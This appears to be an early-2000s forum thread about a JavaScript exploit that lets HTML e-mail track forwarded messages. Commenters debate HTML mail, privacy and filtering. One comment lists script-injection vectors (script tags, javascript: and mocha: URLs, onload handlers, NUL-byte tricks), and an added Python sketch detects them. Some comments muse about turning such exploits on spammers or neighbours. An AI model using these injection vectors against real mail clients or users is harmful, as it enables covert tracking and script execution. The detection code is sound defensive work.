Most users who send HTML e-mail have no idea that they're sending the HTML. They don't have to type out all the code, they just use their favorite mail program, which adds the HTML tags on its own.
-
All I have to say is that if you think Java is insecure
Java is rather secure as can be seen by reading any of the numerous articles on the web about it. Javascript on the other hand is a disaster which was foisted on us by Netscape and exacerbated by Microsoft.
PS: You do realize that the NY Times article is discussing a Javascript exploit and not a Java one, right?
Grabel's Law
Eudora used to include the ability to generate formatted, but non-HTML, text. It included everything you mention, and did not include any networking-specific code. It failed (no one else started to use it, so it was Eudora-specific, and HTML mail became all the rage). It would be a great idea if someone would write up a subset of HTML as an RFC that could be used simply for text formatting (STRONG, BLOCKQUOTE, etc. - maybe even TABLE) for email use (and I would imagine there are many other uses, as well).
Text/enriched seems to cover this (RFC 1896), but that is Eudora's failed attempt.
I would look for most mailers to move to where they get rid of image-fetching and JavaScript.
- (c) 2018 Hank Zimmerman
Perhaps we should all set up a filter to look for script tags in messages and tag them so they can be dealt with? Would be a wise move IMO.
This demonstrates something common when Linux-people complain about MS.. Spending hours (days!!) setting up X & co is ok, but even going thru the menus in IE5 is 'too much work' for some strange reason. An actual linux-zealot I know complained about the silly 'Go!'-button right of the URL field in IE, and about the fact that IE doesn't do 'autocompletion' of URLs as you type them, and that the smooth scroll is silly, and that those 'friendly error messages' are stupid. All of these are just checkboxes in the configuration. Weird!
-- Cure for Cancer instead of SETI! (only w32 yet - mail and beg)
I wasn't aware that JavaScript had any object model to interact with outside of its context as a web page or what have you, which is to say: using JS, I can't detect when the back/next button is clicked and use it to trigger an event.
Apparently (according to the "Privacy Foundation"'s website), it piggybacks onto the base functionality that some clients provide that notify you when someone has read your message, and add in text to the payload when someone forwards (responds?) to the message.
They also claim that this has been in the wild since '98 at least, despite no big hubbub over it? Fishy, fishy, fishy. I'm waiting to see the 'sploit code to buy it myself.
----
Another reason HTML email is bad, besides: wasted bandwidth and storage space, slow loading times, cruddy appearance in text interfaces, interference of ads in personal messages, tracking users' habits by matching email address to cookie, bad cross-platform compatibility, necessity of being connected to view it as intended, being filtered or bounced by no-HTML mail lists, etc., etc. It's not really that much of a surprise.
Wordnik, a dictionary project which aims to collect
This is going to further fuel the debate over whether or not email and news posting should consist of active (JavaScript, DHTML and so on) or passive (plain text, HTML) content. I suppose really it depends on what sort of person you are.
Whilst technically you can convey whatever information you want through the use of plain text (maybe using some *emphasis*) and attachments, for many this is a solution which is less convenient for them - it requires more clicks or keypresses to access, and doesn't present the information in quite such an integrated manner. And in the business world the phrase "time equals money" has been given the status of a law, with companies paying out huge sums of cash to time management consultants and the like. These people don't want any extra time or hassle in their emails, not when they're receiving well over a hundred every day.
For business types active content and embedded files mean more productivity and an easier email experience. They're not concerned about privacy issues, and if they are then well, it's the job of the IT guys, right? So this sort of bug is inevitable - either you cripple active content - something that's too late to do - or you try and provide rock solid security - a challenge people seem only too willing to take on.
It all depends on a) your willingness to expose yourself to risk, and b) your desire for presentation and convenience. Seeing as the web has moved from text-based to graphics-based in the majority, I think the future of email is going to be the same, whether we like it or not.
I think that I should be worried or annoyed by this but I (we) are so used to security holes, lack of privacy online, and spam that the general level of interest I can come up with is pretty minimal. On the one hand, it's pretty sad that there is so much of this stuff that we are desensitized to it; on the other hand, the Internet is still like the Wild West in a sense - it's a frontier with the requisite frontier mentality. I'm sure this has been said elsewhere better than I am saying it, but I think that the dynamic of those pushing the boundaries with advances versus those who try to exploit those boundaries versus those that try and stop them creates a better future world. Those of us on the fringes may be the occasional casualty, but maybe, just maybe, it's for the greater good...
There is no guarantee that the content has been read or understood.
Sorry, I should have used extrans mode
Filtering script tags is far from enough.
There are numerous ways to have script executed in a page.
To name a few:
<script language=javascript>alert('foo')</script>
<img src="javascript:alert('foo')">
<img src="mocha:alert('foo');">
<img src="" onload="alert('foo')">
btw if IE finds a \0 anywhere in a page it is just stripped out. Your parser would have to take this into account.
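Added example, not part of any comment in this thread: a sketch of the mail filter proposed earlier that tags messages carrying script, extended to the carriers listed in the comment above (script elements, javascript:/mocha: URLs, on* event handlers) and stripping NUL bytes before parsing. The function names, the X-Active-Content header, the attribute list and the two extra schemes are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

# javascript: and mocha: come from the comment; the other two are added here.
SCRIPT_SCHEMES = ("javascript:", "mocha:", "livescript:", "vbscript:")
URL_ATTRS = {"src", "href", "background", "action", "lowsrc", "dynsrc"}


class ActiveContentFinder(HTMLParser):
    """Collects (kind, tag, attribute) for every script carrier in an HTML body."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag/attribute names and decodes entities in values.
        if tag == "script":
            self.findings.append(("script-element", tag, ""))
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(("event-handler", tag, name))
            elif name in URL_ATTRS:
                # Compare the scheme with whitespace and control characters removed.
                compact = re.sub(r"[\x00-\x20]+", "", value or "").lower()
                if compact.startswith(SCRIPT_SCHEMES):
                    self.findings.append(("script-url", tag, name))


def find_active_content(html_body):
    # Strip NUL bytes first: the comment notes that IE drops them before parsing.
    finder = ActiveContentFinder()
    finder.feed(html_body.replace("\x00", ""))
    finder.close()
    return finder.findings


def active_content_header(html_body):
    """Value for a hypothetical X-Active-Content header a mail filter could add."""
    kinds = sorted({kind for kind, _, _ in find_active_content(html_body)})
    return ", ".join(kinds) if kinds else "none"


# Constructed samples; the first four mirror the forms listed in the comment.
SAMPLES = {
    "script tag": "<script language=javascript>alert('foo')</script>",
    "javascript: url": "<img src=\"javascript:alert('foo')\">",
    "mocha: url": "<img src=\"mocha:alert('foo');\">",
    "event handler": "<img src=\"\" onload=\"alert('foo')\">",
    "NUL-split tag": "<scr\x00ipt>alert('foo')</scr\x00ipt>",
    "plain formatting": "<b>hello</b> <i>world</i>",
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(f"{label:18} -> {active_content_header(body)}")
```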
That's not true. Set your client to always respond with pure text AND set your client not to execute Javascript.
No mail sent to you will trigger this vulnerability and no mail sent from (or through) you will trigger this vulnerability.
Outlook Express supports these settings.
Tastes Like Chicken
As if we needed another reason to detest HTML email. Getting a mailbox full of 2-line 14K messages was already annoying enough. Now that the NY Times has unleashed the BIG SECRET about HTML mail we can expect the script kiddies to realise they can VIEW the source and even copy Javascript code. Oh, joy.
Personally, I'm a Luddite, and Telnet into my ISP's POP server from work. I just give the client a huge buffer and watch the tags scroll by for fun.
- mindVapour
Spot who didn't READ the article (or even the summary)...
It doesn't matter if YOUR email client is javascript enabled or disabled, if the person you are emailing has theirs enabled.
Next time, read the article before commenting, huh?
--
People should not be afraid of their governments - Governments should be afraid of their people.
This is why I have an email address which I never tell anyone about. That way I am sure that I will never get any spam or stupid emails through it. The funny thing is that I never get any other mail through it either.
If you want to email me, think baseball.
Fight Spammers!
http://www.geocities.com/ResearchTriangle/Facility/8332/reaper-exploit-release.html
Anyone consider the possibility of doing the same, but targeting the people who we'd ALL love to get rid of? I'm talking about Spammers, of course. Email bug, non-malicious javascript coding that "phones home" and gives you information about Spammers, if the reply to address or postmaster sent @ spammer domain email is opened. Hmmm... Instead of freaking out over every exploit that pops up and scrambling to get patches, I wonder why people don't use it as an opportunity to their own benefit for the greater good.
I've been thinking of joining the @home service just so I can crack into my neighbors' browser histories and caches. At the next homeowners association meeting, I won't say a word. I swear.
www.ridiculopathy.com